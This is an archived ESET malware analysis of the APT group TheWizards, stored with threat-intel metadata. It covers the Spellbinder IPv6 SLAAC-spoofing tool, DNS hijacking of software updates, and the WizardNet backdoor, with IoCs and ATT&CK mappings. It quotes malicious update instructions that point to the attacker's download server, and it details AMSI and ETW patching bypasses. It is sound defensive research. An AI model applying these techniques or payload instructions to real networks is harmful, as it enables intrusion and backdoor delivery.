{ "id": "b34c5f34-0f38-481d-8202-d1730e7c4f1d", "created_at": "2026-04-06T00:17:44.677588Z", "updated_at": "2026-04-10T13:12:17.906158Z", "deleted_at": null, "sha1_hash": "5a7cea0a838c40b821978a2db79d18a732f0345c", "title": "TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1198817, "plain_text": "TheWizards APT group uses SLAAC spoofing to perform\r\nadversary-in-the-middle attacks\r\nBy Facundo Muñoz\r\nArchived: 2026-04-05 17:33:57 UTC\r\nIn this blogpost, ESET researchers provide an analysis of Spellbinder, a lateral movement tool for performing\r\nadversary-in-the-middle attacks, used by the China-aligned threat actor that we have named TheWizards.\r\nSpellbinder enables adversary-in-the-middle (AitM) attacks, through IPv6 stateless address autoconfiguration\r\n(SLAAC) spoofing, to move laterally in the compromised network, intercepting packets and redirecting the traffic\r\nof legitimate Chinese software so that it downloads malicious updates from a server controlled by the attackers. \r\nKey points in this blogpost:\r\nWe discovered a malicious downloader being deployed, by legitimate Chinese software update\r\nmechanisms, onto victims’ machines.\r\nThe downloader seeks to deploy a modular backdoor that we have named WizardNet.\r\nWe analyzed Spellbinder: the tool the attackers use to conduct local adversary-in-the-middle\r\nattacks and to redirect traffic to an attacker-controlled server to deliver the group’s signature\r\nbackdoor WizardNet.\r\nWe provide details abouts links between TheWizards and the Chinese company Dianke Network\r\nSecurity Technology, also known as UPSEC.\r\nOverview\r\nIn 2022, we noticed that a suspicious DLL had been downloaded by the popular Chinese input method software\r\napplication known as Sogou Pinyin. The DLL, named after a legitimate component of that software, was a dropper\r\nfor a downloader that retrieved an encrypted blob from a remote server. The blob contained shellcode that loads\r\nthe backdoor we have named WizardNet.\r\nOur research led to the discovery of a tool, used by the attackers, that is designed to perform adversary-in-the-middle attacks using IPv6 SLAAC spoofing to intercept and reply to packets in a network, allowing the attackers\r\nto redirect traffic and serve malicious updates targeting legitimate Chinese software.\r\nVictimology\r\nTheWizards has been constantly active since at least 2022 up to the time of writing. According to ESET telemetry,\r\nTheWizards targets individuals, gambling companies, and unknown entities in the Philippines, Cambodia, the\r\nUnited Arab Emirates, mainland China, and Hong Kong. Its geographical distribution is shown in Figure 1.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 1 of 16\n\nFigure 1. Geographical distribution of the victims, according to ESET telemetry\r\nWe initially discovered and analyzed this tool in 2022, and observed a new version with a few changes that was\r\ndeployed to compromised machines in 2023 and 2024. Once the attackers gain access to a machine in a targeted\r\nnetwork, they deploy an archive called AVGApplicationFrameHostS.zip, and extract its components into\r\n%PROGRAMFILES%\\AVG Technologies. The files include:\r\nAVGApplicationFrameHost.exe\r\nwsc.dll\r\nlog.dat\r\nwinpcap.exe\r\nNext, the attackers install winpcap.exe and run AVGApplicationFrameHost.exe. The latter, originally named\r\nwsc_proxy.exe, is a legitimate software component from AVG that is abused to side-load wsc.dll; this DLL simply\r\nreads the shellcode from the file log.dat and executes it in memory. The shellcode decompresses and loads\r\nSpellbinder in memory.\r\nSpellbinder uses the WinPcap library to capture packets and to reply to packets when needed. The first task is to\r\nselect or find an adapter with which to perform the packet capture. The code uses the WinPcap API\r\npcap_findalldevs to get all available adapter devices. The devices are itemized in a numbered list for the attacker.\r\nOptionally, Spellbinder accepts, as an argument, an index that can be used to pick one adapter from this list. If a\r\ndevice is not supplied, Spellbinder uses the Windows APIs GetBestInterface and GetAdapterInfo to find a suitable\r\nadapter, and prints its information on screen.\r\nFigure 2 shows the output of Spellbinder when no item number is supplied. In that case, the tool finds the most\r\nsuitable adapter by itself.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 2 of 16\n\nFigure 2. Spellbinder’s output during its initialization phase\r\nAs shown in Figure 3, once an adapter is found, Spellbinder uses the WinPcap pcap_open_live API to start\r\ncapturing packets, and creates two threads: one to send ICMPv6 Router Advertisement packets (explained in the\r\nnext section), and a thread to monitor network changes. The WinPcap pcap_loop API does the job of invoking a\r\ncallback function from Spellbinder every time a new packet is captured.\r\nFigure 3. Spellbinder’s decompiled code that initializes the capture of packets and threads\r\nRouter Advertisement thread\r\nThis attack vector was discussed by the IETF as early as 2008 and is caused by a commonly overlooked network\r\nmisconfiguration of IPv4 and IPv6 coexistence. It was then thoroughly detailed in 2011 by Alec Waters, who\r\ndubbed it the SLAAC Attack. It takes advantage of IPv6’s Network Discovery Protocol in which ICMPv6 Router\r\nAdvertisement (RA) messages advertise that an IPv6-capable router is present in the network so that hosts that\r\nsupport IPv6, or are soliciting an IPv6-capable router, can adopt the advertising device as their default gateway.\r\nSpellbinder sends a multicast RA packet every 200 ms to ff02::1 (“all nodes”); Windows machines in the network\r\nwith IPv6 enabled will autoconfigure via stateless address autoconfiguration (SLAAC) using information\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 3 of 16\n\nprovided in the RA message, and begin sending IPv6 traffic to the machine running Spellbinder, where packets\r\nwill be intercepted, analyzed, and replied to where applicable. Figure 4 illustrates the first stage of the attack.\r\nFigure 4. Illustration of the SLAAC attack carried out by Spellbinder\r\nThe RA packet built by Spellbinder consists of four major parts:\r\nRA Flags: has the “managed address configuration” flag set to 0, indicating to hosts that SLAAC should be\r\nused.\r\nThe prefix option that indicates to the host to use the 2001:db8::/64 prefix to generate its IPv6 address,\r\nwhich is not an internet-routable subnet, but rather a subnet reserved for documentation.\r\nThe recursive DNS server (RDNSS) option that provides the host with the addresses of two DNS servers:\r\n240e:56:4000:8000::11 and 240e:56:4000:8000::22. Both addresses are part of AS4134 from China\r\nTelecom Backbone, but do not seem to be responding to DNS requests from the Internet. We have not\r\nfound any evidence indicating that either is a legitimate DNS server.\r\nThe source link-layer option, which provides the MAC address of the machine running Spellbinder as the\r\nrouter to use in the local network segment.\r\nFigure 5 shows one of the ICMPv6 RA messages sent by Spellbinder.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 4 of 16\n\nFigure 5. RA message sent by Spellbinder\r\nFigure 6 shows the output of the Windows ipconfig /all command before and after running Spellbinder from a\r\ncompromised machine in the network.\r\nFigure 6. Result of the Windows ipconfig command, before and after running Spellbinder\r\nPacket processing\r\nAs previously mentioned, a callback function processes the captured raw packets. Spellbinder implements its own\r\nparser to find packets to process, reply to, or print information on screen for the attacker. Table 1 describes some\r\nof the most relevant packet types processed and actions taken by the tool.\r\nTable 1. Protocols and packet types to which Spellbinder can reply\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 5 of 16\n\nProtocol Message type Action taken\r\nDNS Query\r\nIf the queried domain matches one of the domains in a list, it answers\r\nto the DNS query.\r\nICMPv6\r\nRouter Solicitation Sends an RA packet.\r\nRouter Advertisement Logs information about the packet.\r\nNeighbor\r\nAdvertisement (NA)\r\nSends an NA packet.\r\nDHCPv6\r\nSolicit\r\nSends an Advertisement message that provides DNS recursive name\r\nservers with the two previously mentioned IPv6 addresses.\r\nInformation-request\r\nSends a Reply message that provides DNS recursive name servers\r\nwith the two previously mentioned IPv6 addresses.\r\nARP Any Logs information about the packet.\r\nWhen a DNS query is found, Spellbinder checks whether the domain name from the query is present on a\r\nhardcoded list of subdomains. The code performing this check is shown in Figure 7.\r\nFigure 7. Decompiled code that checks whether the queried domain is present in a list of targeted\r\ndomains\r\nFigure 8 is a subset of the hardcoded list in Spellbinder. The full list of targeted domains contains many entries\r\nfrom domains associated with several popular Chinese platforms, such as Tencent, Baidu, Xunlei, Youku, iQIYI,\r\nKingsoft, Mango TV, Funshion, Yuodao, Xiaomi and Xioami’s Miui, PPLive, Meitu, Quihoo 360, Baofeng, and\r\nothers.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 6 of 16\n\nFigure 8. Subset of domains targeted by Spellbinder\r\nWhen a domain from the DNS query is found in the list, Spellbinder crafts and sends a DNS answer message\r\nindicating the domain’s IP address, which is hardcoded in the binary. For example, in the version from 2022 it was\r\n43.155.116[.]7, and the newest version we know of, which was used in 2024, uses 43.155.62[.]54.\r\nSpellbinder informs the attacker that the tool is answering to the DNS query. Figure 9 shows the output of the tool,\r\nwhich includes a stylized hexadecimal dump of the entire packet, the length in bytes, and a title that reads DNS\r\nATTACK PAYLOAD.\r\nFigure 9. Output of Spellbinder when answering to a DNS query of a targeted domain\r\nFigure 10 shows the packet information.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 7 of 16\n\nFigure 10. Wireshark display of a DNS answer message sent by Spellbinder\r\nHijacking of updates\r\nFor this blogpost we have focused on one of the latest cases in 2024, in which the update of Tencent QQ software\r\nwas hijacked. The malicious server that issues the update instructions was still active at the time of writing. Figure\r\n11 illustrates the observed chain.\r\nFigure 11. Compromise chain\r\nThe legitimate software component QQ.exe sends an HTTP request to update.browser.qq.com. The Spellbinder\r\ntool intercepts the DNS query for that domain name and issues a DNS answer with the IP address of an attacker-controlled server used for hijacking, for example, 43.155.62[.]54, that at the time of writing was still serving\r\nmalicious updates.\r\nWhen the request is received by the hijacking server, it replies with the following (beautified by us) JSON-formatted instructions to download an archive also hosted in the same server:\r\n{\r\n \"CSoftID\": 22,\r\n \"CommandLine\": \"\",\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 8 of 16\n\n\"Desp\": \"1.1.1160.80\",\r\n \"DownloadUrl\": \"http://43.155.62[.]54:81/app/minibrowser11_rpl.zip\",\r\n \"ErrCode\": 0,\r\n \"File\": \"minibrowser11.zip\",\r\n \"Flags\": 1,\r\n \"Hash\": \"da73153c76b6f652f9b2847531d1c367\",\r\n \"InstallType\": 0,\r\n \"NewVer\": \"39.1.1170.900\",\r\n \"PatchFile\": \"QBDeltaUpdate.exe\",\r\n \"PatchHash\": \"da73153c76b6f652f9b2847531d1c367\",\r\n \"Sign\": \"\",\r\n \"Size\": 36673429,\r\n \"VerType\": \"\"\r\n}\r\nNext, QQ.exe downloads the archive minibrowser11_rpl.zip and deploys its contents to the victim’s machine; the\r\nmalicious minibrowser_shell.dll is then loaded.\r\nExecution chain after a successful AitM attack\r\nThe execution of the malware on a compromised machine begins with the malicious minibrowser_shell.dll\r\ndownloader. This DLL has three export functions and the execution of any of them triggers its main functionality\r\nbut only if the name of the current process contains QQ — for example, QQ.exe would be valid.\r\nIt uses the WinSock API to connect via TCP to an attacker-controlled server, from where it obtains an encrypted\r\nblob containing position-independent loader code and the WizardNet backdoor.\r\nLoader shellcode\r\nThe loader begins by attempting to use a well-known bypass for AMSI that patches the first bytes of the\r\nAmsiScanBuffer function to return an error code, thus bypassing the mechanism that scans memory for malicious\r\nartifacts. Then, it patches the entry point of the EtwEventWrite function with a RETN 0x14 instruction; this has\r\nthe effect of disabling Event Logging.\r\nTo execute the payload in memory, the loader initializes the .NET runtime, as shown in Figure 12, using the\r\nICLRMetaHost, ICLRRuntimeInfo, and ICorRuntimeHost interfaces, requiring a runtime version of either\r\nv2.0.50727 or v4.0.30319.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 9 of 16\n\nFigure 12. Decompiled code that initializes the .NET runtime to execute WizardNet in memory\r\nThen the payload is decrypted using a simple combination of ADD and XOR. The payload is loaded into memory\r\nusing the .NET runtime, then its entry point is executed.\r\nWizardNet\r\nThe final payload is a backdoor that we named WizardNet – a modular implant that connects to a remote\r\ncontroller to receive and execute .NET modules on the compromised machine. During its initialization it creates a\r\nmutex named Global\\\u003cMD5(computer_name)\u003e and reads shellcode from a file called ppxml.db in the current\r\nworking directory or the value from the key HKCU\\000000, and attempts to inject it into a new process of\r\nexplorer.exe or %ProgramFiles%\\Windows Photo Viewer\\ImagingDevices.exe.\r\nThe last step of the initialization phase is to create a unique identifier for the computer, referred to as the\r\nSessionKey. It is the result of the MD5 hash of the computer name concatenated with the installation time of the\r\nbackdoor and the serial number of the disk drive, with each hex-encoded byte of the hash value separated by @.\r\nThe SessionKey is stored under the registry path HKCU\\Software\\\u003cMD5(computer_name)\u003e\\\r\n\u003cMD5(computer_name)\u003emid.\r\nDepending on its configuration, WizardNet can then create a TCP or UDP socket to communicate with its C\u0026C\r\nserver, and the messages exchanged are padded using the PKCS7 algorithm and encrypted with AES-ECB; the\r\nSessionKey is used as the key for encryption and decryption and the IV is randomly generated for each packet and\r\nplaced before the encrypted data.\r\nThis variant of WizardNet supports five commands, as seen in Table 2. The first three allow it to execute .NET\r\nmodules in memory, thus extending its functionality on the compromised system.\r\nTable 2. Overview of the commands supported by the orchestrator\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 10 of 16\n\nCommand ID Task\r\n0x56\r\nLoad a .NET module into the orchestrator process. The module is received in the same\r\nmessage and loaded from memory.\r\n0x57 Invoke a function from a .NET module loaded with the previous command.\r\n0x58 Unload a module previously loaded with command 0x56.\r\n0x59\r\nUnload a Client plugin assembly. Call the u method implemented in the plugin assembly,\r\npresumably to clean up before being unloaded.\r\n0x5A\r\nSend information to the server in two messages.\r\nThe first message contains system and orchestrator information:\r\n ·   machine name,\r\n ·   OS name and architecture,\r\n ·   time since system started,\r\n ·   WizardNet install date,\r\n ·   privileges of the current process,\r\n ·   security products,\r\n ·   name of the current process,\r\n ·   the previously described SessionKey, and\r\n ·   private IP address.\r\nWhen obtaining a list of security solutions, it makes a list of running processes that match\r\nthe following process names: 360tray, 360sd, kxetray, ksafe, avp, hipstray, qqpcrtp,\r\navcenter, ashdisp, avgwdsvc, securityhealthsystray, mcshield, egui, and rtvscan.\r\nLinks to Sichuan Dianke Network Security\r\nIn December 2024, Trend Micro researchers published an analysis of the MOONSHINE exploit kit and the\r\nDarkNimbus malware for Android devices. The toolset is used by a group Trend Micro tracks as Earth Minotaur\r\nand that targets primarily Tibetan and Uyghur communities. In January 2025, Intelligence Online identified the\r\nChinese company Sichuan Dianke Network Security Technology Co., Ltd., also known as UPSEC (Figure 13), as\r\nthe supplier of the DarkNimbus malware.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 11 of 16\n\nFigure 13. UPSEC’s website\r\nESET tracks the malware that Trend Micro named DarkNimbus as DarkNights (both for Windows and Android);\r\namusingly, Trend Micro named the malware after the string DKNS present in the malware’s function names, and\r\nwe did the same (DarkNights) when we discovered the malware. In April 2025, NCSC UK published an advisory\r\nabout the BADBAZAAR malware and MOONSHINE, also mentioning UPSEC in relation to Trend Micro’s\r\nresearch on Earth Minotaur.\r\nWhile TheWizards uses a different backdoor for Windows (WizardNet), the hijacking server is configured to serve\r\nDarkNights to updating applications running on Android devices. While we have not seen any victims in ESET\r\ntelemetry, we managed to obtain a malicious update instruction for the Android version of Tencent QQ:\r\n{\r\n \"packages\": [{\r\n \"versionCode\": 90999,\r\n \"rules\": [],\r\n \"versionRegion\": \"\",\r\n \"plugins\": [{\r\n \"name\": \"AudioFirstPiece\",\r\n \"packageId\": \"audiofirstpiece\",\r\n \"sampleRate\": 10000,\r\n \"sampleRateHigh\": 12,\r\n \"url\": \"http://43.155.62[.]54:81/app/plugin-audiofirstpiece.ml\",\r\n \"md5\": \"a961766c1b2e5133d589be1cf47e3338\"\r\n }]\r\n }]\r\n}\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 12 of 16\n\nThe file plugin-audiofirstpiece.ml is a ZIP archive that only contains a classes.dex file, which is DarkNights for\r\nAndroid. This indicates that Dianke Network Security is a digital quartermaster to TheWizards APT group.\r\nESET continues tracking TheWizards independently of Earth Minotaur. While both threat actors use\r\nDarkNights/DarkNimbus, according to ESET telemetry TheWizards has focused on different targets and uses\r\ninfrastructure and additional tools (for example, Spellbinder and WizardNet) not observed to be used by Earth\r\nMinotaur.\r\nConclusion\r\nIn 2022, we discovered the activity of a China-aligned APT group that we have named TheWizards. We analyzed\r\nthe custom malware and tools developed and used by TheWizards: the IPv6 AitM tool we’ve named Spellbinder,\r\nwhich allows the attackers to redirect the update protocols of legitimate Chinese software to malicious servers,\r\nwhere the software is tricked into downloading and executing fake updates on victims’ machines, and the\r\nmalicious components that launch the backdoor that we have named WizardNet.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename ESET detection name Description\r\n9784A1483B4586EB12D8\r\n6E549D39CA4BB63871B8\r\nminibrowser_shell\r\n.dll\r\nWin32/Agent.AGNF\r\nDownloader\r\ncomponent.\r\n4DB38A097AE4D5E70B2F\r\n51A8EE13B0C1EE01A2A1\r\nClient.exe MSIL/Agent.DMS\r\nWizardNet\r\nbackdoor.\r\n76953E949AC54BE8FF3A\r\n68794EF1419E9EF9AFCB\r\nipv6.exe Win64/Agent.CAZ\r\nSpellbinder tool\r\n(2022).\r\nDA867188937698C77698\r\n61C72F5490CB9C3D4F63\r\nN/A Win64/Agent.CAZ\r\nSpellbinder tool\r\n(2023), loaded in\r\nmemory.\r\n0CBA19B19DF9E2C5EBE5\r\n5D9DE377D26A1A51B70A\r\nwsc.dll Win64/Agent.EUO\r\nLoads shellcode\r\nfrom log.dat.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 13 of 16\n\nSHA-1 Filename ESET detection name Description\r\n1A8147050AF6F05DEA5F\r\nBCA1AE1FF2FFD2B68F9C\r\nlog.dat Win32/Rozena.BXT\r\nShellcode that\r\nloads Spellbinder.\r\n2D376ADF44DBD9CF5DB0\r\n8884E76192D0BC9984C4\r\nplugin-audiofirstpiece.ml\r\nAndroid/Spy.Agent.EEF\r\nZIP archive\r\ncontaining\r\nDarkNights for\r\nAndroid.\r\n5B70A853D8E989AD102D\r\n639FBF7636B697313ABC\r\nclasses.dex Android/Spy.Agent.EEF\r\nDarkNights for\r\nAndroid.\r\nNetwork\r\nIP Domain Provider First seen Details\r\n43.155.116[.]7 hao[.]com\r\nACEVILLEPTELTD-SG\r\n2022‑11‑06\r\nServer issuing malicious\r\nupdates to legitimate\r\napplications in 2022.\r\nUsed by Spellbinder.\r\n(Note: Spellbinder\r\nhijacks requests to\r\nresolve the hao[.]com\r\ndomain.)\r\n43.155.62[.]54 vv.ssl-dns[.]com\r\nACEVILLEPTELTD-SG\r\n2022‑11‑29\r\nServer issuing malicious\r\nupdates to legitimate\r\napplications in 2023 and\r\n2024. Used by\r\nSpellbinder.\r\n43.135.35[.]84 mkdmcdn[.]com ACE-SG 2023‑11‑15 WizardNet C\u0026C server.\r\n103.243.181[.]120 assetsqq[.]com\r\nHK Kwaifong Group\r\nLimited\r\n2021‑07‑15 DarkNights C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 16 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.001 Acquire Infrastructure:\r\nDomains\r\nTheWizards has registered the domains\r\nhao[.]com, ssl-dns[.]com, and\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 14 of 16\n\nTactic ID Name Description\r\nmkdmcdn[.]com.\r\nT1583.004\r\nAcquire Infrastructure:\r\nServer\r\nTheWizards acquired servers for hosting\r\ntools, C\u0026C, and to serve malicious updates.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nTheWizards uses custom malware such as\r\nthe WizardNet backdoor and Spellbinder.\r\nT1588.002 Obtain Capabilities: Tool\r\nTheWizards installs WinPcap on\r\ncompromised machines; it is required by\r\nSpellbinder.\r\nInitial Access T1659 Content Injection\r\nSpellbinder issues DNS answer messages\r\nwith the IP address of a malicious server to\r\nhijack updates from legitimate applications.\r\nExecution\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nTheWizards uses cmd.exe to execute\r\ncommands to download and execute tools.\r\nT1106 Native API\r\nWizardNet uses CreateProcessA to execute\r\nprocesses it injects shellcode into.\r\nPrivilege\r\nEscalation\r\nT1055 Process Injection\r\nWizardNet can inject code into Windows\r\nprocesses.\r\nDefense\r\nEvasion\r\nT1480.002\r\nExecution Guardrails:\r\nMutual Exclusion\r\nWizardNet creates a mutex to prevent other\r\ninstances of the backdoor from running.\r\nT1112 Modify Registry\r\nAn unknown TheWizards component stores\r\nencrypted shellcode in the registry.\r\nT1027.007\r\nObfuscated Files or\r\nInformation: Dynamic\r\nAPI Resolution\r\nThe downloader and shellcode used by\r\nTheWizards dynamically resolve API\r\naddresses.\r\nT1027.009\r\nObfuscated Files or\r\nInformation: Embedded\r\nPayloads\r\nThe shellcode obtained by the downloader\r\ncontains WizardNet in encrypted form.\r\nT1027.014\r\nObfuscated Files or\r\nInformation: Polymorphic\r\nCode\r\nThe file log.dat contains polymorphic\r\ndecryption code that loads the Spellbinder\r\ntool into memory.\r\nT1055 Process Injection\r\nWizardNet injects shellcode into another\r\nprocess.\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 15 of 16\n\nTactic ID Name Description\r\nT1055.004\r\nProcess Injection:\r\nAsynchronous Procedure\r\nCall\r\nWizardNet uses the QueueUserApc API to\r\nexecute injected code.\r\nDiscovery\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nWizardNet obtains the name of running\r\nprocesses and matches them against a list of\r\nsecurity solutions.\r\nT1082\r\nSystem Information\r\nDiscovery\r\nWizardNet obtains system information such\r\nas computer name, uptime, OS name, etc.\r\nT1124 System Time Discovery WizardNet gets the system time.\r\nCommand and\r\nControl\r\nT1105 Ingress Tool Transfer\r\nWizardNet can deploy tools and new\r\nmodules obtained from its C\u0026C.\r\nT1095\r\nNon-Application Layer\r\nProtocol\r\nWizardNet uses TCP and UDP to\r\ncommunicate with its C\u0026C.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nWizardNet can communicate via TCP or\r\nUDP, and messages exchanged with its C\u0026C\r\nare encrypted with AES.\r\nSource: https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nhttps://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/" ], "report_names": [ "thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks" ], "threat_actors": [ { "id": "86adb59b-9acc-4dac-b7f1-7ac9214c4b97", "created_at": "2025-06-29T02:01:57.19934Z", "updated_at": "2026-04-10T02:00:04.936171Z", "deleted_at": null, "main_name": "TheWizards", "aliases": [], "source_name": "ETDA:TheWizards", "tools": [ "Spellbinder", "WizardNet" ], "source_id": "ETDA", "reports": null }, { "id": "dc813ffb-16bd-46f7-9d8f-8e93089f00c1", "created_at": "2024-12-28T02:01:54.748213Z", "updated_at": "2026-04-10T02:00:04.669444Z", "deleted_at": null, "main_name": "Earth Minotaur", "aliases": [], "source_name": "ETDA:Earth Minotaur", "tools": [ "DarkNimbus", "MOONSHINE" ], "source_id": "ETDA", "reports": null }, { "id": "06f59286-7fc1-4cae-8088-a26543643247", "created_at": "2025-11-07T02:00:03.494055Z", "updated_at": "2026-04-10T02:00:03.893442Z", "deleted_at": null, "main_name": "TheWizards", "aliases": [], "source_name": "MISPGALAXY:TheWizards", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434664, "ts_updated_at": 1775826737, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5a7cea0a838c40b821978a2db79d18a732f0345c.pdf", "text": "https://archive.orkl.eu/5a7cea0a838c40b821978a2db79d18a732f0345c.txt", "img": "https://archive.orkl.eu/5a7cea0a838c40b821978a2db79d18a732f0345c.jpg" } }